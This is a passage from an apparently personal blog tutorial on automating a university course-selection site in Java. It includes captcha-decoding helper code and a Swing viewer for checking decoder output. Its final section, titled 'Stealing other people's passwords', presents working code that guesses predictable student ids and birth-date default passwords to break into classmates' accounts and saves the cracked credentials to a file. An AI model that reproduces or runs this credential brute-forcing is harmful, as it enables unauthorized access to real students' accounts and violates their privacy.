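        try {
            ans = go(ImageIO.read(cin));
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    // Fallback: save the captcha to checkcode.jpg and type it in by hand
    public Decoder(HttpEntity entity) {
        try (OutputStream out = Files.newOutputStream(Paths.get("src/main/resources/checkcode.jpg"))) {
            entity.writeTo(out);
        } catch (IOException e) {
            e.printStackTrace();
            return;
        }
        System.out.print("Captcha (see checkcode.jpg): ");
        ans = new Scanner(System.in).next();
    }
}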
To check the decoder's answers, I wrote a small visual tool:
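import javax.imageio.ImageIO;
import javax.swing.*;
import java.awt.BorderLayout;
import java.awt.Graphics;
import java.awt.event.KeyAdapter;
import java.awt.event.KeyEvent;
import java.awt.event.MouseAdapter;
import java.awt.event.MouseEvent;
import java.awt.image.BufferedImage;
import java.io.File;
import java.io.IOException;

// Shows the downloaded captchas one by one (Up/Down to switch) with the decoder's answer in the title bar
public class DecodeFrame extends JFrame {
    public static void main(String[] args) {
        new DecodeFrame();
    }

    File[] files = new File("src/main/resources/checkcodes").listFiles();
    int fileIndex = 0;
    Decoder decoder = new Decoder();   // loads data.txt once instead of on every repaint
    JTextField text = new JTextField();
    JPanel panel = new JPanel() {
        @Override
        public void paint(Graphics g) {
            try {
                BufferedImage img = ImageIO.read(files[fileIndex]);
                g.drawImage(img, 0, 0, getWidth(), getHeight(), null);
                setTitle(decoder.go(img));   // the frame's title shows the recognised code
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    };

    DecodeFrame() {
        setExtendedState(MAXIMIZED_BOTH);
        setLayout(new BorderLayout());
        add(text, BorderLayout.NORTH);
        add(panel, BorderLayout.CENTER);
        setVisible(true);
        setDefaultCloseOperation(EXIT_ON_CLOSE);
        text.addKeyListener(new KeyAdapter() {
            @Override
            public void keyPressed(KeyEvent e) {
                panel.repaint();
            }
        });
        panel.addKeyListener(new KeyAdapter() {
            @Override
            public void keyPressed(KeyEvent e) {
                if (e.getKeyCode() == KeyEvent.VK_DOWN) {
                    fileIndex = (fileIndex + 1) % files.length;
                    panel.repaint();
                } else if (e.getKeyCode() == KeyEvent.VK_UP) {
                    fileIndex = (fileIndex - 1 + files.length) % files.length;
                    panel.repaint();
                }
            }
        });
        panel.addMouseListener(new MouseAdapter() {
            @Override
            public void mouseEntered(MouseEvent e) {
                panel.requestFocus(); // give the panel keyboard focus for the arrow keys
            }
        });
    }
}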
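7. Stealing other people's passwords
The password on the BUAA graduate course-selection site initially defaults to the student's date of birth, e.g. 19930612. Student ids follow the pattern SY1606604: SY marks an academic master's student, 16 the 2016 intake, 06 the school, 6 the class, and 04 the number within the class. So a loop can simply try the passwords one by one. The program below does this for students 01 to 19 of one class, assuming the password is one of the 365 dates in 1993. The whole run takes about 5-6 minutes.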
public class StealPassword {
    String prefix = "SY16066";
    CloseableHttpClient client = HttpClients.createDefault();

    public static void main(String[] args) throws IOException {
        new StealPassword();
    }

    StealPassword() throws IOException {
        SyllabusGetter getter = new SyllabusGetter();
        PrintWriter writer = new PrintWriter("user.txt");
        for (int i = 1; i < 20; i++) {
            String userId = String.format("%s%02d", prefix, i);
            LocalDate date = LocalDate.of(1993, 1, 1);
            LocalDate end = LocalDate.of(1994, 1, 1);
            while (date.equals(end) == false) {
                String password = date.toString().replace("-", "");
                date = date.plusDays(1);
                System.out.println(userId + " " + password);
                if (getter.login(userId, password, client)) {
                    writer.println(userId + " " + password);
                    break;
                }
            }
        }
        writer.close();
    }
}